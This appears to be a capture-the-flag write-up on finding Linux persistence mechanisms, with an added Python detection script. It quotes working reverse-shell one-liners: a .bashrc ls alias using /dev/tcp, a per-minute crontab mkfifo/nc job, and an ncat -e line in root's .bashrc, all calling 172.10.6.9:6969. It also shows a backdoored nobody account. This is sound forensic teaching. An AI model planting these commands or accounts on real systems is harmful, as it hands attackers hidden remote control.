The scenario: we are called to find all the persistence mechanisms left by an attacker on a Linux machine.

1. What is the server’s OS version?

We access the server over SSH with the credentials given: ssh giorgio@[IP]. Once connected, the OS version is shown directly: Ubuntu 20.04.4 LTS. It can also be confirmed with cat /etc/os-release.

2. What’s the most interesting file you found in giorgio’s home directory?

Once in the home directory, we list all files, hidden ones included, with ls -a.

giorgio@giorgio:~$ ls -a
. .bad_bash .bash_logout .cache .selected_editor .sudo_as_admin_successful
.. .bash_history .bashrc .profile .ssh .viminfo

There is an interesting file called .bad_bash, which is not a dotfile normally found in a home directory.

3. Another file that can be found in every user’s home directory is the .bashrc file. Can you check if you can find something interesting in giorgio’s .bashrc?

We are asked to analyze the user's .bashrc file, which bash reads every time an interactive shell starts.

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
alias ls='(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls --color=auto'

The analysis shows a suspicious alias for ls: ls='(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls --color=auto'. Every time giorgio runs ls, it starts a background interactive bash whose standard input, output and error are redirected to a TCP connection to 172.10.6.9 on port 6969 (a reverse shell), silences any error with 2>/dev/null, and then runs the real ls so the user notices nothing.

4. Did you find anything interesting about scheduled tasks?

We are now asked to look for unusual behaviour in the scheduled tasks owned by the user. Per-user cron jobs are stored in a crontab file (on Ubuntu under /var/spool/cron/crontabs). To access it, we can use crontab -e to open the current user's crontab file; crontab -l prints the same content without opening an editor, which is safer on a system under investigation. System-wide jobs in /etc/crontab and /etc/cron.d are worth checking the same way.

# m h  dom mon dow   command
* * * * * /usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f

The opened file shows a suspicious command run by the scheduled task: /usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f. It creates a named pipe at /tmp/f and uses it to build a bidirectional channel: the shell's output is sent to the netcat connection, and input from netcat is written to the pipe and fed back into the shell, giving the host at 172.10.6.9 remote command execution. Because the schedule is * * * * *, the job runs every minute, so the connection is re-established within a minute if it is killed.

5, 6, 7. There is an error message in your terminal. What does it say?

It is time to investigate the root account. After logging in to the root account, a strange error message appears in the terminal: Ncat: TIMEOUT. The error message relates to the command ncat -e /bin/bash 172.10.6.9 6969, which is displayed just after it.

root@giorgio:/home/giorgio# Ncat: TIMEOUT.

[1]+  Exit 1                  ncat -e /bin/bash 172.10.6.9 6969

We still need to find out where the error message comes from. Analysis of the root user's .bashrc (/root/.bashrc) shows that the ncat command has been written into it, so it runs every time root opens an interactive shell, which gives the attacker persistence. The job-control line [1]+ Exit 1 shows the command was launched as a background job, and the TIMEOUT means its connection to 172.10.6.9:6969 was not answered.

8. What is the last persistence mechanism?

The final step is to find the last persistence mechanism the attackers used. It is said that the mechanism is related to unusual usage of something or someone already present in Linux. The first thing to check is the users of the system, using the /etc/passwd and /etc/shadow files. Something that comes up directly is that the nobody account has a password tied to it: its shadow entry holds a $6$ (SHA-512 crypt) hash, where a stock Ubuntu install has * for this account. However, the nobody account is a special user account used by the system to run processes and services with minimal privileges. Here it seems to be used as a regular user account, which is clearly unusual activity. Additionally, the nobody account belongs to the root group (GID set to 0) and its login shell is set to /bin/bash, which allows interactive login. The nobody account should have a non-interactive shell such as /usr/sbin/nologin or /bin/false.

root@giorgio:/home/giorgio# cat /etc/shadow
nobody:$6$A9gfhQx8obsFyyd2$op0KH1DveXQjwlabwY3jlFy6hTofzbQ/zawUmQLiT5cLOd.vNpqk0r1K4Z5cNVI98KAvD/cdrh6CbaziBrw1A.:19095:0:99999:7:::
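A small triage script that checks for the three classes of indicator found in this writeup (reverse-shell one-liners in shell rc files and crontabs, and account anomalies in /etc/passwd and /etc/shadow). This is an added example, not part of the original writeup or of any tool it uses; the sample inputs are constructed from the artefacts above, with placeholder hashes, and the indicator patterns are my own choice.

```python
import re

# Indicators from the reverse-shell one-liners in this writeup: bash's /dev/tcp
# pseudo-device, interactive shells, nc/ncat with -e, FIFO plumbing.
SUSPICIOUS = re.compile(r"/dev/tcp/|bash -i|\bn(cat|c)\b.*\s-e\b|mkfifo|\bsh -i\b")
# Shells a system or service account is expected to have.
NON_INTERACTIVE = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

def find_reverse_shells(text):
    """Return (line_no, line) for non-comment lines matching an indicator,
    e.g. from a shell rc file or the output of crontab -l."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # comments such as the crontab header are not jobs
        if SUSPICIOUS.search(line):
            hits.append((n, line.strip()))
    return hits

def audit_accounts(passwd_text, shadow_text):
    """Flag what was seen on nobody: a usable hash on a system account, a non-root
    user with GID 0, an interactive shell on a system account. Review hits by hand."""
    hashes = {l.split(":")[0]: l.split(":")[1] for l in shadow_text.splitlines() if ":" in l}
    findings = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) < 7:
            continue
        user, uid, gid, shell = f[0], int(f[2]), int(f[3]), f[6]
        system_acct = user != "root" and (uid < 1000 or uid == 65534)
        h = hashes.get(user, "")
        locked = h in ("", "*") or h.startswith("!")  # covers '!', '!!', '!*'
        if system_acct and not locked:
            findings.append((user, "usable password hash on a system account"))
        if gid == 0 and user != "root":
            findings.append((user, "primary group is root (GID 0)"))
        if system_acct and shell not in NON_INTERACTIVE:
            findings.append((user, "interactive login shell " + shell))
    return findings

# Constructed sample input modelled on the artefacts above; hashes are placeholders.
SAMPLE_BASHRC = ("# some more ls aliases\nalias ll='ls -alF'\n"
    "alias ls='(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls --color=auto'\n")
SAMPLE_CRONTAB = ("# m h  dom mon dow   command\n* * * * * /usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;"
    "/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f\n")
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\nnobody:x:65534:0:nobody:/nonexistent:/bin/bash\n"
    "giorgio:x:1000:1000::/home/giorgio:/bin/bash\n")
SAMPLE_SHADOW = ("root:$6$PLACEHOLDER:19095:0:99999:7:::\nnobody:$6$PLACEHOLDER:19095:0:99999:7:::\n"
    "giorgio:$6$PLACEHOLDER:19095:0:99999:7:::\n")
```

On a live host the same functions can be fed the contents of each user's rc files, crontab -l output and the two account files; every hit still needs a human look, since some legitimate system accounts (for example sync with /bin/sync) will trip the shell check.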

Thanks for reading!